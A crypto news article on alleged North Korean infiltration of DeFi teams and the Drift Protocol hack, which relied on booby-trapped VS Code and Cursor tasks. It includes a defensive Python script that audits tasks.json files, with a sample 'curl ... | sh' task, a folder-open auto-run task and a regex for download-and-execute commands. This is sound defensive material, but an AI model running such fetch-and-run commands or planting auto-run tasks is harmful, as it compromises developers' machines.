North Korea‑connected operatives have spent years quietly embedding themselves inside crypto companies and DeFi projects.
A Long-Standing Crypto-Infiltration Saga
News and reports from the Democratic People’s Republic of Korea tend to have a particular conspiracy-theory, action-movie feel to them. They also have a tendency to be true and not exaggerated at all.
This time, security researcher and MetaMask developer Taylor Monahan said in a Sunday post on X that these methods date back to DeFi’s formative years, with actors linked to the DPRK quietly contributing to several major, widely used protocols.
Yuppppppp
Lots of DPRK IT Workers built the protocols you know and love, all the way back to defi summer
She claims that North Korean IT workers have quietly worked inside more than 40 DeFi projects over roughly seven years, including protocols that became household names after DeFi summer.
oh god uhhhh like sushi, thorchain, yam, pickle, harvest, reclaim, swing, paid, naos, shezmu, qrolli, saffron, sifu, napier, harmony, blueberry, stabble, onering, elemental, divvy, la token, impermax, kira, cook, fantom, ankr, gamerse, metaplay, spice, beanstalk, deltaprime,…
These workers often have “real” on‑chain experience (seven years of blockchain development) but operate under stolen or synthetic identities, plugging into teams through normal hiring funnels.
Her posts reply to tim, a pseudonymous builder and public face of Titan, a Solana‑based DEX aggregator and routing project, who said that at a previous job his team interviewed an extremely qualified candidate who turned out to be a Lazarus operative. Lazarus is the North Korea‑affiliated group that has funneled billions of dollars in stolen funds through cryptocurrency networks.
at a previous job, we interviewed someone who turned out to be a Lazarus operative. he did video calls and was extremely qualified
we invited him for in person interviews and he ultimately declined to fly out, so we passed
Renowned crypto detective ZachXBT also replied to tim’s post, explaining that this is not just “Lazarus” but a network of DPRK units (Lazarus, APT38, AppleJeus, etc.) coordinated by the Reconnaissance General Bureau and optimized for financial cybercrime. Their methods rely on “basic, relentless” outreach via LinkedIn, job boards, interviews and Zoom, plus remote developer roles that teams still grant far too easily.
Lazarus Group is the collective name for all DPRK state sponsored cyber actors.
The main issue is everyone groups them all together when the complexity of the threats is different.
New Information On The Crypto-Hack On Drift Protocol
Drift attributed the attack “with medium confidence” to UNC4736, a North Korea–aligned, state‑sponsored hacking group.
The protocol said the attackers relied on an elaborate social-engineering strategy: fake professional personas, in‑person conference interactions, and booby‑trapped developer tooling to compromise contributors before finally executing the exploit. The attackers posed as a legitimate trading firm, met Drift contributors in person across several countries, and used fully constructed identities with work histories and professional networks before triggering the exploit.
The attackers weaponized common developer tooling by slipping malicious tasks into VS Code and Cursor configurations, delivering a compromised repository that contributors ran locally without realizing it. Taken together, this makes the incident far more like an insider‑style supply‑chain compromise than a straightforward smart-contract exploit.
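The editor-tooling angle above has a simple defender-side counterpart: VS Code only runs tasks once a folder has been granted Workspace Trust, so the moment to read a cloned repository's task definitions is before clicking "Yes, I trust the authors". The script below is an added example, not code from the article or from Drift Protocol. It parses `.vscode/tasks.json` (VS Code's documented location; Cursor is assumed here to read the same file), including the JSONC comments and trailing commas VS Code accepts, and ranks each task: high when it is marked to run automatically on folder open (`runOptions.runOn: "folderOpen"`), medium when the command pipes downloaded content into an interpreter, info otherwise. The sample task file embedded in the script is constructed for the demonstration and points at a reserved `.invalid` domain.

```python
"""Pre-trust audit of VS Code / Cursor task files in a freshly cloned repository.

Added example, not code from the article or from Drift Protocol. Assumes the editor
reads .vscode/tasks.json (VS Code's documented location; Cursor is assumed to share
it) and that the file may be JSONC (comments and trailing commas allowed).
"""
import json
import os
import re
import tempfile
from pathlib import Path

# Matches, in order of priority: a JSON string (kept), a // or /* */ comment
# (dropped), or a trailing comma before } or ] (dropped). Trying the string
# alternative first means a "//" inside a URL string is never treated as a comment.
_JSONC_NOISE_RE = re.compile(r'("(?:\\.|[^"\\])*")|//[^\n]*|/\*.*?\*/|,(?=\s*[}\]])', re.S)
# Heuristic for "download and execute" command shapes; extend to taste.
_REMOTE_EXEC_RE = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr)\b.*\|\s*(sh|bash|zsh|python\d?|node|iex)\b", re.I)


def strip_jsonc(text):
    """Return plain JSON: comments and trailing commas removed, string literals untouched."""
    return _JSONC_NOISE_RE.sub(lambda m: m.group(1) or "", text)


def load_jsonc(text):
    return json.loads(strip_jsonc(text))


def flatten_command(task):
    """Join command and args (strings or {value, quoting} objects) into one reviewable line."""
    cmd = task.get("command", "")
    parts = [cmd if isinstance(cmd, str) else str(cmd.get("value", ""))]
    parts += [a if isinstance(a, str) else str(a.get("value", "")) for a in task.get("args", [])]
    return " ".join(p for p in parts if p)


def audit_tasks(doc):
    """One finding per task, in file order, with a severity a reviewer can sort on."""
    findings = []
    for task in doc.get("tasks", []):
        cmd = flatten_command(task)
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            sev, why = "high", "runs automatically when the folder is opened"
        elif _REMOTE_EXEC_RE.search(cmd):
            sev, why = "medium", "downloads remote content and pipes it to an interpreter"
        else:
            sev, why = "info", "on-demand task; still read the command"
        findings.append({"label": task.get("label", "<unlabelled>"),
                         "severity": sev, "reason": why, "command": cmd})
    return findings


def audit_repo(root):
    """Audit every .vscode/tasks.json under a checkout, nested workspaces included."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        if os.path.basename(dirpath) != ".vscode" or "tasks.json" not in filenames:
            continue
        path = os.path.join(dirpath, "tasks.json")
        rel = os.path.relpath(path, root)
        try:
            task_findings = audit_tasks(load_jsonc(Path(path).read_text(encoding="utf-8")))
        except (OSError, ValueError) as exc:  # an unparseable file is itself worth a look
            task_findings = [{"label": "-", "severity": "medium",
                              "reason": f"unparseable tasks.json: {exc}", "command": ""}]
        findings += [dict(f, file=rel) for f in task_findings]
    return findings


# Constructed sample (JSONC with a comment and a trailing comma); not from any real repository.
SAMPLE_TASKS_JSONC = r"""{
  // project build tooling
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    { "label": "prepare-on-open", "type": "shell", "command": "node ./scripts/prepare.js",
      "runOptions": { "runOn": "folderOpen" } },
    { "label": "fetch-deps", "type": "shell", "command": "curl",
      "args": ["-fsSL", "https://example.invalid/deps.sh", "|", "sh"] }
  ]
}"""


def demo():
    """Write the sample into a temporary checkout and audit it end to end."""
    with tempfile.TemporaryDirectory() as root:
        vs = Path(root) / ".vscode"
        vs.mkdir()
        (vs / "tasks.json").write_text(SAMPLE_TASKS_JSONC, encoding="utf-8")
        findings = audit_repo(root)
    for f in findings:
        print(f"[{f['severity']:6}] {f['file']} :: {f['label']}: {f['reason']}\n    {f['command']}")
    return findings


if __name__ == "__main__":
    demo()
```

Run it against a real checkout with `audit_repo("/path/to/clone")` while the folder is still open in Restricted Mode, or better, before opening it at all. The script only covers task definitions; debug configurations in `launch.json`, recommended extensions, git hooks and package-manager lifecycle scripts are other paths by which a cloned repository can run code on a contributor's machine and deserve the same read-before-trust treatment.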
Market Implications
This saga shows that crypto hacking has turned into a structural national‑security risk. Regulators and sanctions bodies are already tightening around DPRK IT networks, and more aggressive enforcement is likely to follow.
Large, state‑linked exploits create latent protocol risk: higher insurance premia, potential delistings, governance infighting over restitution, and longer risk‑off periods for DeFi tokens and perp volumes.

Cover image from Perplexity. BTCUSDT chart from Tradingview.